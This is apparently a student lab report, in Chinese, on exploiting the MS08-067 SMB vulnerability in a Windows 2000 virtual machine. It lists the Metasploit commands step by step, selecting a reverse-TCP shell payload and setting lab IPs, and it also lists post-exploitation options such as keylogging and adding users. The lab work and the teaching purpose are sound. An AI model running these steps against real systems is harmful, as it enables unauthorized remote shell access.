一、实验内容

1.使用kali进行靶机的漏洞扫描,利用metasploit选择其中的一个漏洞进行攻击,并获取权限。

2.分析攻击的原理以及获取了什么样的权限。

二、实验要求

1.熟悉kali原理和使用方法。

2.认真操作,详细记录实验过程和实验结果。

三、实验工具

笔记本电脑一台,安装parallels desktop虚拟机,安装kali和靶机系统windows10。另外安装了vmware虚拟机,安装kali和靶机系统windows2000。

四、实验步骤

(一)pd虚拟机下搭建渗透测试环境

1.在pd虚拟机下安装kali攻击机系统以及windows10靶机系统。

1267268-20171028182807555-1006472609.png

Kali是一个linux系统,Kali Linux预装了许多渗透测试软件,包括nmap (端口扫描器)、Wireshark (数据包分析器)、John the Ripper (密码破解器),以及Aircrack-ng (一应用于对无线局域网进行渗透测试的软件).用户可通过硬盘、live CD或live USB运行Kali Linux。Metasploit的Metasploit Framework支持Kali Linux,Metasploit一套针对远程主机进行开发和执行Exploit代码的工具。

1267268-20171028182838101-1783923799.png

2.在parallels desktop中设置两台虚拟机网络为共享网络模式(若是vmware虚拟机则是nat模式),自动分配IP地址,之后两台虚拟机就可以直接ping通。

(1)靶机ip地址获取:在cmd中输入ipconfig,获取ip地址为10.211.55.3。

1267268-20171028182919805-1209997748.png

(2)攻击机ip地址获取:在shell中输入ifconfig,获取ip地址为10.211.55.4。

1267268-20171028183930898-834079063.png

(3)可见,两台虚拟机处于同一网段下,可以互相ping通。

1267268-20171028184040289-1348519128.png
1267268-20171028184049023-1569231762.png

一般来说在unix或linux系统中会一直ping下去,这时按快捷键Ctrl+Z或Ctrl+C均可停止ping。

(4)补充说明“vmware下虚拟机的三种网络模式”

a.桥接。桥接网络是指本地物理网卡和虚拟网卡通过VMnet0虚拟交换机进行桥接,物理网卡和虚拟网卡在拓扑图上处于同等地位,那么物理网卡和虚拟网卡就相当于处于同一个网段,虚拟交换机就相当于一台现实网络中的交换机,所以两个网卡的IP地址也要设置为同一网段。

b.NAT。NAT模式中,就是让虚拟机借助NAT(网络地址转换)功能,通过宿主机器所在的网络来访问公网。NAT模式中,虚拟机的网卡和物理网卡的网络,不在同一个网络,虚拟机的网卡是在vmware提供的一个虚拟网络。

NAT和桥接的比较: NAT模式和桥接模式虚拟机都可以上外网;由于NAT的网络在vmware提供的一个虚拟网络里,所以局域网其他主机是无法访问虚拟机的,而宿主机可以访问虚拟机,虚拟机可以访问局域网的所有主机,因为真实的局域网相对于NAT的虚拟网络,就是NAT的虚拟网络的外网,不懂的人可以查查NAT的相关知识;桥接模式下,多个虚拟机之间可以互相访问;NAT模式下,多个虚拟机之间也可以相互访问。

c.Host-Only。在Host-Only模式下,虚拟网络是一个全封闭的网络,它唯一能够访问的就是主机。其实Host-Only网络和NAT网络很相似,不同的地方就是Host-Only网络没有NAT服务,所以虚拟网络不能连接到Internet。主机和虚拟机之间的通信是通过VMware Network Adepter VMnet1虚拟网卡来实现的。

(二)vmware下搭建渗透测试环境

在按步骤进行攻击操作后(详细步骤见第三部分),发现作为靶机的win10系统无漏洞可攻击,于是改用老师所给的靶机系统进行试验,在vmware虚拟机下操作。

1.vmware下安装kali

这里注意其中一步操作“将GRUB安装至硬盘-将GRUB启动引导器安装到主引导记录吗?-是”后,“安装启动引导器的设备”不能空着,可填写dev-sda,否则可能出现安装linux后黑屏只出现光标的现象。

2.设置网络模式

设置虚拟机下的kali和windows靶机系统为nat模式。其中设置靶机ip地址为192.168.87.131,攻击机ip地址为192.168.87.129,且互相都可以ping通。

1267268-20171028184407101-377251453.png
1267268-20171028184753773-407646298.png
1267268-20171028184740633-776219012.png

(三)MS08_067远程漏洞攻击实践

1.在kali终端中开启msfconsole。

1267268-20171028185217570-499531308.png

2.输入命令search ms08_067,会显示出找到的渗透模块,如下图所示:

1267268-20171028190006226-2007262819.png

3.输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用。

1267268-20171028190131461-471898482.png

4.输入命令show payloads会显示出有效的攻击载荷,比如shell_reverse_tcp。

1267268-20171028190232789-548459986.png

5.命令show targets会显示出可以被攻击的靶机的操作系统型号,如下图所示:

1267268-20171028190251976-821604911.png

6.使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。

1267268-20171028190714586-1778004908.png

7.输入命令show options显示我们需要在攻击前需要设置的数据。

1267268-20171028190742351-1228759061.png

8.输入命令set LHOST "kali Ip",即set LHOST 192.168.87.129;set RHOST "Win Ip",即set RHOST 192.168.87.131。

1267268-20171028190901430-510801281.png

使用命令show options再次查看payload状态。

1267268-20171028190931805-880256083.png

9.输入命令exploit开始攻击,如下图所示是正常攻击成功结果。

1267268-20171028191007258-1023243743.png

10.在kali上执行ipconfig/all得到如下图所示:

1267268-20171028191031101-585411480.png

在win 2000上执行同样的命令(所得与上图相同)如下图所示:

1267268-20171028191058476-171803147.png

11.输入“netstat -a”命令,可以查看靶机开启了哪些端口。

1267268-20171028191126242-670888956.png

12.输入“netstat -n”命令, 查看靶机端口的网络连接情况。

1267268-20171028191153539-32880060.png

五、思考

1.原理分析

MS08_067漏洞是著名的远程溢出漏洞,影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。本次实验就是metasploit利用ms08_067漏洞对win2000虚拟机进行渗透测试。

MS08_067是一个在windows445号端口上的漏洞,需要事先查看该端口是否开放,这里使用“nmap -PS 靶机ip”语句发现445号端口开放。因此可以使用MS08_067漏洞进行exploit。

1267268-20171028204842008-1480530332.png

2.实验拓展

本次实验获得了靶机的cmdshell,除了实验中展示的几种操作,还可以进行新建用户、截屏、记录键盘输入、获取ruby交互界面、进程迁移、安装成服务等等许多操作。今后还可以对浏览器、客户端等方面的攻击进行拓展实践。

转载于:https://www.cnblogs.com/20179204gege/p/7747655.html

Logo

华为开发者空间,是为全球开发者打造的专属开发空间,汇聚了华为优质开发资源及工具,致力于让每一位开发者拥有一台云主机,基于华为根生态开发、创新。

更多推荐